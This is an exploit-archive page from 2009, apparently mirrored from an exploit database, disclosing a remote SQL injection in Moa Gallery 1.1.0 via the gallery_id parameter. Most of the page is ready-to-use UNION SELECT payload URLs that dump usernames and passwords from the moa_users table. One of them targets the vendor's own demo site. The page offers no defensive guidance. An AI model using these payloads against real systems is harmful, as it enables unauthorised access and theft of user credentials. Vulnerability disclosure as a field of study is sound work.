[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Moa Gallery 1.1.0 (gallery_id) Remote SQL Injection Vulnerability
# Published : 2009-08-24
# Author : Mr.tro0oqy
# Previous Title : EMO Breader Manager (video.php movie) SQL Injection Vulnerability
# Next Title : Arcade Trade Script 1.0b (Auth Bypass) Insecure Cookie Handling Vuln
======================================================================
[??] Script : Moa gallery 1.1.0 (gallery_id) Remote Sql injection vuln
[??] Language : php
[??] Download : http://sourceforge.net/projects/moagallery/
[??] Script site : http://www.moagallery.net/
[??] Founder: Mr.tro0oqy <- from Yemen
[??] Gr44tz to: [H]-> borken heart :(
[??] E-mail : t.4@windowslive.com
======================================================================
exploit:
--------
http://www.xxx.com/path/index.php?action=gallery_view&gallery_id=-0000000009+union+select+concat(name,char(58),password)+from+moa_users--
--------
demo:
--------
http://www.moagallery.net/demo/index.php?action=gallery_view&gallery_id=-0000000609+union+select+concat%28name,char%2858%29,password%29+from+moa_users--
# www.Syue.com [2009-08-24]